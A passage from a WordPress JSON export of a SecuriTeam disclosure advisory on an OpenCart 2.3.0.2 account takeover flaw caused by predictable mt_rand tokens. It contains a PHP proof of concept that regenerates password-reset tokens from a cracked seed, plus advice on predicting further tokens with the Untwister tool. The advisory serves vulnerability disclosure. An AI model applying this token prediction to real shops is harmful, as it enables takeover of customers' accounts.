class=\"crayon-line\" id=\"crayon-58d83e6967031653553671-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">out<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58d83e6967031653553671-30\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58d83e6967031653553671-31\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58d83e6967031653553671-32\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">__name__<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;__main__&#8221;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58d83e6967031653553671-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0042 seconds] -->  <\/p>\n<p><u>Generate.php<\/u><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58d83e6967037080544418\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &lt;?php  $seed = 2934787735;  mt_srand($seed);    $string = &#8216;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789&#8217;;  $max = strlen($string) &#8211; 1;    for ($i = 0; $i &lt; 40; $i++) {  \t$string[mt_rand(0, $max)];  }    $token = &#8221;;  for ($i = 0; $i &lt; 40; $i++) {  \t$token .= $string[mt_rand(0, $max)];  }    echo $token;  ?&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58d83e6967037080544418-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58d83e6967037080544418-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58d83e6967037080544418-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58d83e6967037080544418-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58d83e6967037080544418-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58d83e6967037080544418-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58d83e6967037080544418-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58d83e6967037080544418-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58d83e6967037080544418-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58d83e6967037080544418-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58d83e6967037080544418-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58d83e6967037080544418-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58d83e6967037080544418-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58d83e6967037080544418-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58d83e6967037080544418-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58d83e6967037080544418-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58d83e6967037080544418-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58d83e6967037080544418-18\">18<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58d83e6967037080544418-1\"><span class=\"crayon-ta\">&lt;?php<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58d83e6967037080544418-2\"><span class=\"crayon-v\">$seed<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2934787735<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58d83e6967037080544418-3\"><span class=\"crayon-e\">mt_srand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">$seed<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58d83e6967037080544418-4\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58d83e6967037080544418-5\"><span class=\"crayon-v\">$string<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58d83e6967037080544418-6\"><span class=\"crayon-v\">$max<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">strlen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">$string<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58d83e6967037080544418-7\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58d83e6967037080544418-8\"><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">$i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">40<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58d83e6967037080544418-9\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">$string<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-e\">mt_rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$max<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58d83e6967037080544418-10\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58d83e6967037080544418-11\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58d83e6967037080544418-12\"><span class=\"crayon-v\">$token<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58d83e6967037080544418-13\"><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">$i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">40<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58d83e6967037080544418-14\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">$token<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$string<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-e\">mt_rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$max<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58d83e6967037080544418-15\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58d83e6967037080544418-16\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58d83e6967037080544418-17\"><span class=\"crayon-k\">echo<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">$token<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58d83e6967037080544418-18\"><span class=\"crayon-ta\">?&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0085 seconds] -->  <\/p>\n<p><strong>Untwister<\/strong><br \/> When OpenCart has been running for some time, the token generated by it would need more than just one token to be deduced (allowing you to know the next token that is generated). To make life easier a tool called <a href=\"https:\/\/github.com\/altf4\/untwister\" target=\"_blank\">Untwister<\/a> has been built. Using the Untwister an attacker can use multiple tokens he has recovered to predict the next tokens that will be generated by OpenCart.<\/p>\n<p>More details on Untwister can be found here: <a href=\"https:\/\/www.bishopfox.com\/blog\/2014\/08\/untwisting-mersenne-twister-killed-prng\/\" target=\"_blank\">https:\/\/www.bishopfox.com\/blog\/2014\/08\/untwisting-mersenne-twister-killed-prng\/<\/a>.<\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3022\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: Maor Schwartz| Date: Sun, 26 Mar 2017 13:14:58 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes a account takeover vulnerability found in OpenCart (version 2.3.0.2). OpenCart is a opensource e-commerce platform written in PHP. &#8220;Opencart is an easy to-use, powerful, Open Source online store management program that can manage multiple online stores from a single back-end.&#8221; Credit An independent security researcher &#8220;Ayrx&#8221; has reported this &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3022\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 OpenCart Account Takeover<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11741,10757],"class_list":["post-7117","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-insecure-randomness","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7117","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=7117"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7117\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=7117"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=7117"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=7117"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}